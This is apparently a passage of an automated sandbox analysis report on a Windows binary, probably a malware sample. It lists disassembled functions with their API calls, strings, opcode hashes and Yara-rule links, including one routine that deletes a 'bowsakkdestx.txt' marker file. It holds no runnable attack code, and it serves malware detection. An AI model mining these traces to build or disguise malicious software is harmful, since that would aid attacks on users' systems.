                                                                                                                                                                                                      • Opcode ID: 23fc771ccd0fb84302ef14e270554964de1445af84905d4ed2fddc0fcc519b49
                                                                                                                                                                                                      • Instruction ID: 3b6c08389df4e48a430741a1ce4ce94f3584f996b8880ee9781e1533d320f445
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 23fc771ccd0fb84302ef14e270554964de1445af84905d4ed2fddc0fcc519b49
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8701DB72B8022873D9306A557C86FFB775C9F51721F0001B7FE08D6181E5E9554646D5
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0040C420, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C438
                                                                                                                                                                                                      • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C44E
                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?), ref: 0040C45B
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Path$AppendDeleteFileFolder
                                                                                                                                                                                                      • String ID: bowsakkdestx.txt
                                                                                                                                                                                                      • API String ID: 610490371-2616962270
                                                                                                                                                                                                      • Opcode ID: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
                                                                                                                                                                                                      • Instruction ID: 22f96f022367e4ecd8cb06d74e3ea6c1a096c1ee21cc35b9366b07434c4c4e8f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 60E0807564031C67DB109B60DCC9FD5776C9B04B01F0000B2FF48D10D1D6B495444E55
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00422130, Relevance: 6.2, APIs: 4, Instructions: 163COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2974526305-0
                                                                                                                                                                                                      • Opcode ID: 4f8a020f16c05ce8eb09244123f141b643e409d9ae385191a5e5949e342c4f07
                                                                                                                                                                                                      • Instruction ID: 8e6e0b0b404069c1ace538d88af1fa9e5aae20a8402e44ab6f3f0d96efeb0f41
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4f8a020f16c05ce8eb09244123f141b643e409d9ae385191a5e5949e342c4f07
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9A51D830B00225FBCB148E69AA40A7F77B1AF11320F94436FF825963D0D7B99D61CB69
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0043C677, Relevance: 6.1, APIs: 4, Instructions: 97COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0043C6AD
                                                                                                                                                                                                      • __isleadbyte_l.LIBCMT ref: 0043C6DB
                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000,?,00000000,00000000,?,0043C0ED,?,00BFBBEF,00000003), ref: 0043C709
                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000,?,00000000,00000000,?,0043C0ED,?,00BFBBEF,00000003), ref: 0043C73F
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3058430110-0
                                                                                                                                                                                                      • Opcode ID: 545b86b4f69abcc520aee3959e2c1e78f1be635744476d2f07a63b5a2a38a0c0
                                                                                                                                                                                                      • Instruction ID: 9bb69ce0c337472f3e835d3bfc0adb25a23875f1fe15b1d3b69bac0ae3c4b713
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 545b86b4f69abcc520aee3959e2c1e78f1be635744476d2f07a63b5a2a38a0c0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4E31F530600206EFDB218F75CC85BBB7BA5FF49310F15542AE865A72A0D735E851DF98
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 004C7094, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • ___BuildCatchObject.LIBCMT ref: 004C70AB
                                                                                                                                                                                                        • Part of subcall function 004C77A0: ___BuildCatchObjectHelper.LIBCMT ref: 004C77D2
                                                                                                                                                                                                        • Part of subcall function 004C77A0: ___AdjustPointer.LIBCMT ref: 004C77E9
                                                                                                                                                                                                      • _UnwindNestedFrames.LIBCMT ref: 004C70C2
                                                                                                                                                                                                      • ___FrameUnwindToState.LIBCMT ref: 004C70D4
                                                                                                                                                                                                      • CallCatchBlock.LIBCMT ref: 004C70F8
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2901542994-0
                                                                                                                                                                                                      • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                                                                                                                      • Instruction ID: e860502f941f6c9850043d2e9c4655f99114053cf07e0eb82383b029c5c3ae24
                                                                                                                                                                                                      • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2C011736000108BBCF526F56CC01FDA3FAAEF48718F15801EF91866121D33AE9A1DFA5
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 004253B3, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00425007: __getptd_noexit.LIBCMT ref: 00425008
                                                                                                                                                                                                        • Part of subcall function 00425007: __amsg_exit.LIBCMT ref: 00425015
                                                                                                                                                                                                      • __calloc_crt.LIBCMT ref: 00425A01
                                                                                                                                                                                                        • Part of subcall function 00428C96: __calloc_impl.LIBCMT ref: 00428CA5
                                                                                                                                                                                                      • __lock.LIBCMT ref: 00425A37
                                                                                                                                                                                                      • ___addlocaleref.LIBCMT ref: 00425A43
                                                                                                                                                                                                      • __lock.LIBCMT ref: 00425A57
                                                                                                                                                                                                        • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__calloc_impl
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2580527540-0
                                                                                                                                                                                                      • Opcode ID: 923d6512d195770e32f2a331459b38e6cbd765635c4de3bafb7b37f16666932d
                                                                                                                                                                                                      • Instruction ID: 8e8bf19fb99f986105457608807abe9f1de148b308aa0ea96eb71ffb67844566
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 923d6512d195770e32f2a331459b38e6cbd765635c4de3bafb7b37f16666932d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A3018471742720DBD720FFAAA443B1D77A09F40728F90424FF455972C6CE7C49418A6D
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 004127A0, Relevance: 6.0, APIs: 4, Instructions: 39stringCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • lstrlenW.KERNEL32 ref: 004127B9
                                                                                                                                                                                                      • _malloc.LIBCMT ref: 004127C3
                                                                                                                                                                                                        • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                                                                                                                        • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                                                                                                                        • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00820000,00000000,00000001,00000001,?,?,?,00430E81,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00420CA5
                                                                                                                                                                                                      • _memset.LIBCMT ref: 004127CE
                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 004127E4
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2824100046-0
                                                                                                                                                                                                      • Opcode ID: d807541a0d1b126bc38ced4668b3b61b472b47aa0d79cc9e7bfc34870b6aacc2
                                                                                                                                                                                                      • Instruction ID: 750470dcacb0e1f47d667e481962336cdcd22eeec5e51d764cc358051e51787a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d807541a0d1b126bc38ced4668b3b61b472b47aa0d79cc9e7bfc34870b6aacc2
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C6F02735701214BBE72066669C8AFBB769DEB86764F100139F608E32C2E9512D0152F9
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00412800, Relevance: 6.0, APIs: 4, Instructions: 28stringCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • lstrlenA.KERNEL32 ref: 00412806
                                                                                                                                                                                                      • _malloc.LIBCMT ref: 00412814
                                                                                                                                                                                                        • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                                                                                                                        • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                                                                                                                        • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00820000,00000000,00000001,00000001,?,?,?,00430E81,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00420CA5
                                                                                                                                                                                                      • _memset.LIBCMT ref: 0041281F
                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000), ref: 00412832
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2824100046-0
                                                                                                                                                                                                      • Opcode ID: 5d53f8f732e4342f1a2ab947ea56d6b713f7325b43ea2b5621e341dec89f9ad8
                                                                                                                                                                                                      • Instruction ID: a3b2a97d17252553cb1267f0baabe0c67c158e4fedc78561389223423b5350a8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5d53f8f732e4342f1a2ab947ea56d6b713f7325b43ea2b5621e341dec89f9ad8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 74E086767011347BE510235B7C8EFAB665CCBC27A5F50012AF615D22D38E941C0185B4
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00414920, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 319COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _memmove
                                                                                                                                                                                                      • String ID: invalid string position$string too long
                                                                                                                                                                                                      • API String ID: 4104443479-4289949731
                                                                                                                                                                                                      • Opcode ID: 9bedb6a4875daed597998ed3f540e95eec51a82ba5ae0fcf6873f5b611974ef0
                                                                                                                                                                                                      • Instruction ID: e15d95b7bc4e28eadeb147f52893af2b9f74cdff9e85ed34d7497a2036010d09
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9bedb6a4875daed597998ed3f540e95eec51a82ba5ae0fcf6873f5b611974ef0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 86C15C70704209DBCB24CF58D9C09EAB3B6FFC5304720452EE8468B655DB35ED96CBA9
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00470040, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _memset
                                                                                                                                                                                                      • String ID: .\crypto\asn1\tasn_new.c
                                                                                                                                                                                                      • API String ID: 2102423945-2878120539
                                                                                                                                                                                                      • Opcode ID: 71e1991ce2e3632dc73bc3e3216da1e10f6e2bb0c3d1e289869c94216a61690f
                                                                                                                                                                                                      • Instruction ID: a01d7b69f66ede694d5e1501cc12839462a5262961aeb872149f1145b0afa5c3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 71e1991ce2e3632dc73bc3e3216da1e10f6e2bb0c3d1e289869c94216a61690f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D510971342341A7E7306EA6AC82FB77798DF41B64F04442BFA0CD5282EA9DEC44817A
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 004516A0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: .\crypto\err\err.c$unknown
                                                                                                                                                                                                      • API String ID: 0-565200744
                                                                                                                                                                                                      • Opcode ID: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
                                                                                                                                                                                                      • Instruction ID: d1206a4052711c5ef0d05e5a1f97d3c0da723a5ab1c334b9285c6dd525f2274c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 72117C69F8070067F6202B166C87F562A819764B5AF55042FFA482D3C3E2FE54D8829E
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0042A77E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0042AB93
                                                                                                                                                                                                      • ___raise_securityfailure.LIBCMT ref: 0042AC7A
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                                                                                                      • String ID: 8Q
                                                                                                                                                                                                      • API String ID: 3761405300-2096853525
                                                                                                                                                                                                      • Opcode ID: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
                                                                                                                                                                                                      • Instruction ID: cc78ca7643d31f84c049b3cf87471233b0d3094e131d8c276326ba2ae67c1d9c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4F21FFB5500304DBD750DF56F981A843BE9BB68310F10AA1AE908CB7E0D7F559D8EF45
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00480620, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _memset.LIBCMT ref: 00480686
                                                                                                                                                                                                        • Part of subcall function 00454C00: _raise.LIBCMT ref: 00454C18
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 0048062E
                                                                                                                                                                                                      • .\crypto\evp\digest.c, xrefs: 00480638
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _memset_raise
                                                                                                                                                                                                      • String ID: .\crypto\evp\digest.c$ctx->digest->md_size <= EVP_MAX_MD_SIZE
                                                                                                                                                                                                      • API String ID: 1484197835-3867593797
                                                                                                                                                                                                      • Opcode ID: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
                                                                                                                                                                                                      • Instruction ID: 96aa535d5fc7c596ca855a62b55a20e08de4f59c43588781e3518ec4b5147bd0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 82012C756002109FC311EF09EC42E5AB7E5AFC8304F15446AF6889B352E765EC558B99
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%